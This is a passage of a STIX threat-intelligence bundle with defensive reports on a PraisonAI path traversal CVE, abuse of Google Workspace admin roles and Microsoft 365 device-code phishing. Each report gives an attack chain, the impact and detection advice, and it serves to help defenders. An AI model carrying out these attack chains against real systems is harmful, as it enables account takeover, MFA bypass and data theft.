      "source_ref": "report--4889256d-c691-5964-ae0a-beaf090811b7",
      "target_ref": "indicator--c2398054-49d6-5ddc-81b5-aca1d02892a8"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploitation of Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--e1428024-8ae5-56ab-8b67-536201ee1f17",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--4889256d-c691-5964-ae0a-beaf090811b7",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--dba05e09-3e54-51b6-af3e-58644b62ad7d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "File and Directory Discovery",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1083",
          "url": "https://attack.mitre.org/techniques/T1083"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--9fc69c2b-e6a0-5c66-8dcb-656feab3d8b8",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--4889256d-c691-5964-ae0a-beaf090811b7",
      "target_ref": "attack-pattern--dba05e09-3e54-51b6-af3e-58644b62ad7d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--c0eb6184-9307-5ab1-8131-a73df6f30447",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--4889256d-c691-5964-ae0a-beaf090811b7",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--625bcfd0-9318-5abf-8fe9-295efe008e12",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "T1565",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1565",
          "url": "https://attack.mitre.org/techniques/T1565"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ea76b9ab-be2f-506a-a0ce-62283fdef487",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--4889256d-c691-5964-ae0a-beaf090811b7",
      "target_ref": "attack-pattern--625bcfd0-9318-5abf-8fe9-295efe008e12"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Endpoint Denial of Service",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1499",
          "url": "https://attack.mitre.org/techniques/T1499"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--66b16255-d9fb-5eb1-8c5f-69b93b07db7b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--4889256d-c691-5964-ae0a-beaf090811b7",
      "target_ref": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--4889256d-c691-5964-ae0a-beaf090811b7",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-56078: PraisonAI Path Traversal Vulnerability",
      "description": "## Overview\n\nA critical path traversal vulnerability, tracked as CVE-2026-56078, has been identified in PraisonAI software versions prior to 1.5.115. The flaw resides within the `MultiAgentMonitor` component, where the application fails to properly sanitize `agent IDs` when constructing file paths. This oversight allows attackers to inject directory traversal sequences, such as `../`, directly into agent ID parameters. Successful exploitation grants attackers the ability to read, write, or overwrite arbitrary files on the system hosting the PraisonAI instance. This can lead to severe consequences, including the unauthorized disclosure of sensitive data, disruption of service through file corruption or deletion, or even remote code execution by placing malicious files (e.g., web shells) in critical directories. The vulnerability is rated with a CVSS v3.1 base score of 8.8, indicating a high-severity threat to affected systems.\n\n## Attack Chain\n\n1.  **Reconnaissance \u0026 Vulnerability Identification**: An attacker identifies a publicly exposed PraisonAI instance running a vulnerable version (prior to 1.5.115).\n2.  **Malicious Request Crafting**: The attacker crafts a request targeting the `MultiAgentMonitor` component. This request includes a specially crafted `agent ID` containing path traversal sequences (e.g., `../`, `..\\`).\n3.  **Path Traversal Exploitation**: The PraisonAI application processes the malicious `agent ID` without proper sanitization, causing it to construct a file path that navigates outside the intended directory.\n4.  **Arbitrary File Read/Write**: Depending on the attacker's objective and the server's permissions, they can now read arbitrary files (e.g., configuration files, source code, sensitive data) or write/overwrite arbitrary files (e.g., log files, application binaries, web server scripts).\n5.  **Information Disclosure/Denial of Service**: If reading sensitive files, the attacker can exfiltrate confidential information. If overwriting or deleting critical files, the attacker can cause a denial of service for the PraisonAI application or the underlying system.\n6.  **Remote Code Execution (RCE)**: If the attacker successfully writes a malicious script (e.g., a web shell) to a web-accessible directory, they can then execute arbitrary commands on the server through that script, achieving full system compromise.\n\n## Impact\n\nThe impact of CVE-2026-56078 is significant, as it can lead to various forms of compromise. If exploited, an organization could face severe sensitive data exposure, including credentials, API keys, or proprietary algorithms used by the AI agents. Attackers could also achieve a denial of service by corrupting or deleting critical application files, rendering PraisonAI inoperable or destabilizing the host system. The most severe outcome is potential remote code execution, which grants the attacker full control over the compromised server, allowing them to establish persistence, pivot to other internal systems, and exfiltrate data at will. While specific victim counts or targeted sectors are not yet available, any organization utilizing PraisonAI versions prior to 1.5.115 is at risk.\n\n## Recommendation\n\n*   **Patch CVE-2026-56078 immediately** by upgrading PraisonAI to version 1.5.115 or later as advised in the official advisories: https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-766v-q9x3-g744.\n*   **Deploy the provided Sigma rules** to your SIEM to detect attempts at path traversal exploitation against your web servers and unusual file modifications.\n*   **Enable comprehensive web server logging** to capture full HTTP request details, including URI, query parameters, and POST body data, which are crucial for triggering the detection rules.\n*   **Implement filesystem integrity monitoring** on servers hosting PraisonAI to alert on unauthorized modifications or creations of files in critical directories, which could indicate post-exploitation activity.\n",
      "published": "2026-06-18T23:29:02Z",
      "labels": [
        "path-traversal",
        "vulnerability",
        "web-application",
        "rce",
        "dos",
        "data-exfiltration"
      ],
      "object_refs": [
        "indicator--99d26e41-2855-502b-bf8c-60077458ca8a",
        "indicator--2e7c10fa-c5ab-57df-8631-3ac88b2aebca",
        "indicator--c2398054-49d6-5ddc-81b5-aca1d02892a8",
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--dba05e09-3e54-51b6-af3e-58644b62ad7d",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--625bcfd0-9318-5abf-8fe9-295efe008e12",
        "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-56078"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/MervinPraison/PraisonAI"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-766v-q9x3-g744"
        },
        {
          "source_name": "reference",
          "url": "https://www.vulncheck.com/advisories/praisonai-arbitrary-file-read-and-write-via-path-traversal-in-multiagentmonitor"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--af36256b-7f61-5622-8047-8836c263a2f6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Account Access Removal",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1531",
          "url": "https://attack.mitre.org/techniques/T1531"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--271d2713-6b4e-5941-8779-6b2662d27b3c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--7d501071-5157-5bdf-aaab-23a5272a1a20",
      "target_ref": "attack-pattern--af36256b-7f61-5622-8047-8836c263a2f6"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--118409a1-50c6-53b4-8358-4e00d9675cac",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Domain or Tenant Policy Modification",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1484",
          "url": "https://attack.mitre.org/techniques/T1484"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--3bbd54c8-def0-55b7-ad7a-ebf6f768b214",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--7d501071-5157-5bdf-aaab-23a5272a1a20",
      "target_ref": "attack-pattern--118409a1-50c6-53b4-8358-4e00d9675cac"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--7d501071-5157-5bdf-aaab-23a5272a1a20",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Google Workspace Admin Role Deletion",
      "description": "## Overview\n\nAdversaries with elevated privileges within Google Workspace may delete custom administrative roles to impede security operations, remove delegated administrator access, or obfuscate their activities during an active incident. This action, often observed post-compromise, targets roles specifically configured for security teams or those granting granular access to critical services like audit logs or user management. The deletion of a custom role immediately revokes all associated privileges from assigned users and groups, potentially creating significant operational disruption and blind spots for defenders. Understanding the details of such deletions requires thorough review of historical audit logs to reconstruct the role's original permissions and assigned principals. This tactic hinders incident response capabilities and allows threat actors to maintain persistence or further their objectives undetected.\n\n## Attack Chain\n\n1.  **Initial Access**: An attacker gains unauthorized access to a Google Workspace administrator account, often through phishing, credential stuffing, or exploiting a vulnerable connected application.\n2.  **Privilege Escalation/Maintenance**: The attacker leverages the compromised account, or further elevates privileges if necessary, to ensure sufficient permissions to modify or delete administrative roles within Google Workspace.\n3.  **Reconnaissance**: The attacker enumerates existing custom administrative roles to identify those granting sensitive permissions, particularly roles held by security personnel or those with broad access to audit logs or security settings.\n4.  **Defense Evasion Preparation**: The attacker plans to remove roles that could enable detection or response, such as roles held by incident responders or those that monitor critical security events.\n5.  **Admin Role Deletion**: The attacker executes the deletion of one or more identified custom administrative roles via the Google Admin console or API, specifying the `google_workspace.admin.role.name`. This action triggers an `event.action: DELETE_ROLE` in audit logs.\n6.  **Impact Activation**: The deletion instantly revokes all associated privileges from users and groups previously assigned to the role, leading to disrupted delegated administration, loss of security team access, or hindrance of incident response efforts.\n7.  **Continued Operations**: With security monitoring or administrative oversight potentially impaired, the attacker proceeds with their primary objectives, such as data exfiltration or further system compromise, with reduced risk of detection.\n\n## Impact\n\nThe deletion of custom administrative roles in Google Workspace can severely impact an organization's security posture and operational continuity. It directly results in the immediate revocation of privileges for all users and groups previously assigned to the deleted role, potentially disrupting delegated administration and critical security functions. This action can blind security teams to ongoing threats by removing their access to audit logs or security settings, thereby hindering incident response efforts. Organizations may experience operational downtime, increased risk of data breaches, or delayed threat containment due to compromised administrative capabilities. Understanding the full blast radius requires reviewing historical audit logs to identify all affected principals and permissions, complicating recovery.\n\n## Recommendation\n\n*   Enable comprehensive logging for Google Workspace administrative events, specifically ensuring `data_stream.dataset: google_workspace.admin` and `event.action: DELETE_ROLE` are collected and forwarded to your SIEM.\n*   Deploy the `Detect Google Workspace Admin Role Deletion` and `Detect Google Workspace Admin Role Unassignment` Sigma rules in this brief to your SIEM and tune for your environment.\n*   Upon detection of admin role deletion or unassignment, immediately investigate the `user.email` and `source.ip` of the initiating account, and the `google_workspace.admin.role.name` affected.\n*   Cross-reference all role deletion/unassignment events with approved change management requests and validate the authorization of the performing administrator to distinguish between legitimate and malicious activity.\n*   If an unauthorized role deletion is confirmed, prioritize recreating the affected role with equivalent privileges and reassigning previously impacted users and groups to restore critical administrative functions.\n",
      "published": "2026-06-18T15:30:09Z",
      "labels": [
        "cloud",
        "google-workspace",
        "identity-and-access-audit",
        "impact",
        "defense-evasion",
        "admin-role-deletion"
      ],
      "object_refs": [
        "attack-pattern--af36256b-7f61-5622-8047-8836c263a2f6",
        "attack-pattern--118409a1-50c6-53b4-8358-4e00d9675cac"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://support.google.com/a/answer/2406043?hl=en"
        },
        {
          "source_name": "reference",
          "url": "https://www.elastic.co/security-labs/google-workspace-attack-surface-part-one"
        },
        {
          "source_name": "reference",
          "url": "https://www.elastic.co/security-labs/google-workspace-attack-surface-part-two"
        }
      ],
      "confidence": 60
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5ee3ab13-ad3c-534b-b2c1-7213321a2238",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Account Manipulation",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1098",
          "url": "https://attack.mitre.org/techniques/T1098"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--26efcab2-978a-5ddc-a605-385ce817c96c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--130df62e-e251-583f-990e-2c368fab42ad",
      "target_ref": "attack-pattern--5ee3ab13-ad3c-534b-b2c1-7213321a2238"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--130df62e-e251-583f-990e-2c368fab42ad",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Google Workspace Admin Role Assigned to a User or Group",
      "description": "## Overview\n\nAdversaries are known to target cloud environments like Google Workspace to establish persistent access and escalate privileges. A critical technique involves assigning administrative roles, such as the `SUPER_ADMIN_ROLE` or other `*_ADMIN_ROLE` types, to existing or newly created user accounts or groups. This action, often occurring post-initial compromise, grants attackers broad control over the Google Workspace tenant, including the ability to manage users, devices, security settings, and applications. Such elevated privileges enable adversaries to bypass security mechanisms like Single Sign-On (SSO), ensure long-term presence, and facilitate follow-on activities like data exfiltration, modifying mail routing, or altering other critical configurations, posing a significant risk to organizational data and operations.\n\n## Attack Chain\n\n1.  **Initial Compromise**: Adversary obtains initial access to a Google Workspace account, potentially an administrator account or an account with privileges to create users or manage groups.\n2.  **Privilege Discovery**: The adversary identifies existing user accounts or creates new ones that can be granted elevated administrative roles within Google Workspace.\n3.  **Role Assignment**: The adversary assigns a high-privilege administrative role (e.g., `SUPER_ADMIN_ROLE`, `GROUP_ADMIN_ROLE`) to a compromised or newly created user account or an existing group.\n4.  **Persistence Establishment**: The elevated role provides the adversary with sustained access to the Google Workspace environment, often bypassing standard security controls like Single Sign-On (SSO).\n5.  **Further Actions**: Utilizing the newly acquired administrative privileges, the adversary performs additional malicious activities, such as creating OAuth tokens, modifying security controls, changing mail routing, or altering SSO settings.\n6.  **Data Exfiltration/Impact**: The adversary may then proceed with data exfiltration, service disruption, or other objectives, maintaining broad control over the tenant's identity, device, and application settings.\n\n## Impact\n\nThe successful assignment of administrative roles to an adversary-controlled account grants comprehensive control over the affected Google Workspace tenant. This can lead to unauthorized access to sensitive organizational data, alteration of critical security controls (such as SSO settings), disruption of email communications, and creation of backdoors (e.g., OAuth tokens) for sustained access. Organizations across all sectors are vulnerable, and the impact can range from severe data breaches and compliance failures to operational paralysis and reputational damage.\n\n## Recommendation\n\n*   Deploy the Sigma rules in this brief to your SIEM and tune for your environment, specifically focusing on `google_workspace.admin.role.name` values.\n*   Ensure Google Workspace Admin logs are being ingested into your security monitoring platform to enable detection of `event.action: \"ASSIGN_ROLE\"` events.\n*   Regularly audit existing administrative role assignments within Google Workspace, paying close attention to `*_ADMIN_ROLE` types.\n*   Implement security best practices outlined by Google, available at `https://support.google.com/a/answer/7587183`.\n*   Investigate `user.email` and `source.ip` for any user performing `ASSIGN_ROLE` actions that appear unusual.\n",
      "published": "2026-06-18T15:31:12Z",
      "labels": [
        "cloud-security",
        "google-workspace",
        "persistence",
        "privilege-escalation",
        "account-manipulation",
        "saas-security"
      ],
      "object_refs": [
        "attack-pattern--5ee3ab13-ad3c-534b-b2c1-7213321a2238"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://support.google.com/a/answer/172176?hl=en"
        },
        {
          "source_name": "reference",
          "url": "https://www.elastic.co/security-labs/google-workspace-attack-surface-part-one"
        },
        {
          "source_name": "reference",
          "url": "https://www.elastic.co/security-labs/google-workspace-attack-surface-part-two"
        },
        {
          "source_name": "reference",
          "url": "https://support.google.com/a/answer/7587183"
        },
        {
          "source_name": "reference",
          "url": "https://support.google.com/a/answer/7061566"
        },
        {
          "source_name": "reference",
          "url": "https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-google_workspace.html"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5ee3ab13-ad3c-534b-b2c1-7213321a2238",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Account Manipulation",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1098",
          "url": "https://attack.mitre.org/techniques/T1098"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--c331121a-6ad4-5b1b-a538-57a7330c6dd0",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--ae290051-a328-54ec-a2bc-831c1bac52c9",
      "target_ref": "attack-pattern--5ee3ab13-ad3c-534b-b2c1-7213321a2238"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--ae290051-a328-54ec-a2bc-831c1bac52c9",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Google Workspace Custom Admin Role Created for Persistence",
      "description": "## Overview\n\nAdversaries targeting Google Workspace environments may create custom administrative roles to establish a persistent foothold and achieve granular, elevated privileges. Unlike predefined admin roles, custom roles allow threat actors to craft permissions precisely tailored to their objectives, such as modifying security controls, granting illicit OAuth access, or altering mail routing. This technique enables attackers to maintain access and perform follow-on actions even if initial access vectors are remediated or the original compromised account is secured. The creation of such a role, often followed by assigning it to a compromised or attacker-controlled account, provides a stealthy persistence mechanism that avoids alerting on modifications to well-known prebuilt roles. This activity, observed in various cloud environments, highlights the need for continuous monitoring of IAM changes.\n\n## Attack Chain\n\n1.  An attacker gains unauthorized access to a Google Workspace administrator account, typically through phishing, credential compromise, or exploitation of vulnerabilities.\n2.  The attacker logs into the Google Workspace Admin Console using the compromised administrative credentials, assuming the identity of a legitimate administrator.\n3.  Within the Admin Console, the attacker navigates to the 'Admin roles' section to initiate the creation of a new custom administrative role.\n4.  The attacker defines specific, granular privileges for the new custom role, carefully selecting permissions that align with their objectives (e.g., user management, security settings, Gmail routing).\n5.  To establish persistence, the attacker assigns this newly created custom role to a pre-existing compromised user account or a newly provisioned attacker-controlled account, granting it the defined permissions.\n6.  With the custom role assigned, the attacker can now leverage its tailored permissions to maintain access, bypass security controls, modify system configurations, or exfiltrate data, even if the initial administrator account's access is revoked.\n\n## Impact\n\nSuccessful exploitation of this technique grants adversaries persistent and tailored access to the Google Workspace environment, enabling them to bypass existing security controls and perform various malicious activities. Attackers can modify critical security settings, grant unauthorized OAuth access to third-party applications, alter mail routing rules for data exfiltration or interception, or manipulate user accounts. The granular nature of custom roles makes detection challenging, potentially leading to prolonged undetected access, significant data breaches, and compromise of the organization's communication and collaboration infrastructure.\n\n## Recommendation\n\n*   Deploy the Sigma rule \"Google Workspace Custom Admin Role Created\" in this brief to your SIEM and tune for your environment.\n*   Configure Google Workspace logging to capture `CREATE_ROLE` and `ASSIGN_ROLE` events to ensure visibility into administrative changes.\n*   Review Google Workspace admin logs for `event.action: ASSIGN_ROLE` actions following a detected `CREATE_ROLE` event to identify principals receiving the new role.\n*   Reduce the `var.interval` of the Google Workspace Filebeat module to 10 minutes (from the default 2 hours) to minimize event lag as described in the Setup section.\n",
      "published": "2026-06-18T15:32:16Z",
      "labels": [
        "google-workspace",
        "cloud-security",
        "persistence",
        "privilege-escalation",
        "iam"
      ],
      "object_refs": [
        "attack-pattern--5ee3ab13-ad3c-534b-b2c1-7213321a2238"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://support.google.com/a/answer/2406043?hl=en"
        },
        {
          "source_name": "reference",
          "url": "https://www.elastic.co/security-labs/google-workspace-attack-surface-part-one"
        },
        {
          "source_name": "reference",
          "url": "https://www.elastic.co/security-labs/google-workspace-attack-surface-part-two"
        }
      ],
      "confidence": 60
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Valid Accounts",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1078",
          "url": "https://attack.mitre.org/techniques/T1078"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--fb8c0e7f-6f73-5f7d-a318-e18fdc576e07",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--07e32eae-829d-5134-a40a-2c22bd7ddb41",
      "target_ref": "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--3dd3accc-f54c-5fb7-acd3-17fd9651741c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Phishing",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1566",
          "url": "https://attack.mitre.org/techniques/T1566"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--5b535ece-c092-5c2e-8bf2-f36e77563363",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--07e32eae-829d-5134-a40a-2c22bd7ddb41",
      "target_ref": "attack-pattern--3dd3accc-f54c-5fb7-acd3-17fd9651741c"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--d1ed5799-980b-5d2c-bc5a-beb8d47d4d92",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Use Alternate Authentication Material",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1550",
          "url": "https://attack.mitre.org/techniques/T1550"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--a3883670-2e48-591d-b69c-c3bcd6679c7e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--07e32eae-829d-5134-a40a-2c22bd7ddb41",
      "target_ref": "attack-pattern--d1ed5799-980b-5d2c-bc5a-beb8d47d4d92"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--07e32eae-829d-5134-a40a-2c22bd7ddb41",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Microsoft 365 OAuth Device Code Phishing Exploits Non-Compliant Devices",
      "description": "## Overview\n\nThreat actors are increasingly utilizing sophisticated phishing techniques, specifically targeting the OAuth device code flow within Microsoft 365, to circumvent multi-factor authentication (MFA). Campaigns observed leveraging tools like Kali365 and tradecraft similar to Storm-2372, dating back at least to early 2025 according to referenced reports, lure victims into authorizing access on attacker-controlled or personal non-compliant devices. This method exploits the legitimate device code authentication mechanism by directing users to genuine Microsoft endpoints to complete their login and MFA, while the attacker's phishing kit polls the token endpoint in the background to harvest an MFA-satisfied access token. This approach bypasses traditional MFA protections by manipulating the authorization process itself, granting attackers persistent access and enabling subsequent malicious activities such as reconnaissance and data exfiltration.\n\n## Attack Chain\n\n1.  **Initial Access / Phishing Lure**: Attackers distribute phishing lures (e.g., email, instant message) containing a unique device code and instructions for the victim to visit a legitimate Microsoft verification URL (e.g., microsoft.com/devicelogin).\n2.  **Device Code Entry**: The victim navigates to the genuine Microsoft verification URL and, as instructed by the lure, enters the attacker-provided device code.\n3.  **Authentication and MFA**: The victim is prompted to authenticate with their Microsoft 365 credentials and completes multi-factor authentication (MFA) on a legitimate Microsoft login page.\n4.  **Token Harvesting**: Concurrently, the attacker's phishing kit, having initiated the device code flow, continuously polls the token endpoint. Upon successful authentication and MFA by the victim, the kit intercepts and harvests the resulting MFA-satisfied refresh token and access token. This often occurs from a device not compliant with the organization's security policies.\n5.  **Unauthorized Access**: The attacker uses the harvested tokens to gain unauthorized access to the victim's Microsoft 365 resources (e.g., Exchange Online, SharePoint Online, Microsoft Teams, OneDrive).\n6.  **Persistence Establishment**: To maintain access, attackers may register a new device to the compromised user's account, establishing Primary Refresh Token (PRT) persistence that survives password changes.\n7.  **Reconnaissance and Lateral Movement**: With persistent access, the attacker performs reconnaissance within the victim's environment, enumerating mailboxes, files, and other cloud resources, and potentially moving laterally to other connected applications or services.\n8.  **Impact and Exfiltration**: Finally, the attacker may exfiltrate sensitive data, initiate further attacks, or manipulate cloud resources based on their objectives.\n\n## Impact\n\nSuccessful device code phishing attacks result in complete bypass of multi-factor authentication, granting attackers MFA-satisfied access tokens that provide persistent and unauthorized entry to critical Microsoft 365 services such as Exchange Online, SharePoint Online, and Teams. This leads to immediate compromise of user accounts, enabling data exfiltration, email account takeover, and access to sensitive documents. Attackers can also establish long-term persistence by registering new devices, making detection and remediation more challenging. While no specific victim counts or industry sectors are provided in the source, the technique is broadly applicable to any organization utilizing Microsoft 365, posing a significant risk of intellectual property theft, financial fraud, and business disruption.\n\n## Recommendation\n\n*   Deploy the Sigma rule \"M365 OAuth Device Code Grant from Non-Compliant Device\" to your SIEM to detect anomalous device code authentication originating from unmanaged endpoints.\n*   Monitor `o365.audit` logs for `RequestType: \"Cmsi:Cmsi\"` events, paying close attention to `o365.audit.DeviceProperties` (especially `Value: \"False\"`) and the associated `source.ip` and `source.as.organization.name` for unusual origins.\n*   Implement Conditional Access policies in Microsoft Entra ID to restrict device code authentication to only necessary users and applications, and enforce requirements for compliant or hybrid-joined devices.\n*   Deploy the Sigma rule \"M365 Suspicious Device Registration by User\" to identify attempts by threat actors to establish persistence post-compromise by registering new devices.\n*   Educate users about the risks of device code phishing, emphasizing vigilance against unsolicited requests to enter codes on authentication pages and the importance of verifying the authenticity of login prompts.\n*   For confirmed compromises, immediately revoke all refresh tokens for the affected user, reset their credentials, and review `azure.signinlogs`, `azure.graphactivitylogs`, and `azure.auditlogs` for post-compromise activity and remove any unauthorized device registrations.\n",
      "published": "2026-06-18T15:37:29Z",
      "labels": [
        "cloud",
        "saas",
        "identity",
        "microsoft-365",
        "initial-access",
        "phishing",
        "persistence"
      ],
      "object_refs": [
        "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd",
        "attack-pattern--3dd3accc-f54c-5fb7-acd3-17fd9651741c",
        "attack-pattern--d1ed5799-980b-5d2c-bc5a-beb8d47d4d92"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://arcticwolf.com/resources/blog/token-bingo-dont-let-your-code-be-the-winner/"
        },
        {
          "source_name": "reference",
          "url": "https://arcticwolf.com/resources/blog/kali365-expands-into-aws-microsoft-okta-xerox-max-messenger/"
        },
        {
          "source_name": "reference",
          "url": "https://www.ic3.gov/PSA/2026/PSA260521"
        },
        {
          "source_name": "reference",
          "url": "https://www.volexity.com/blog/2025/02/13/multiple-russian-threat-actors-targeting-microsoft-device-code-authentication/"
        },
        {
          "source_name": "reference",
          "url": "https://www.microsoft.com/en-us/security/blog/2025/02/13/storm-2372-conducts-device-code-phishing-campaign/"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Valid Accounts",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1078",
          "url": "https://attack.mitre.org/techniques/T1078"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--c340d79f-4386-5f53-b3d6-1e2374e70d6a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--08d12749-05e6-539e-8a98-5701be5a2b67",
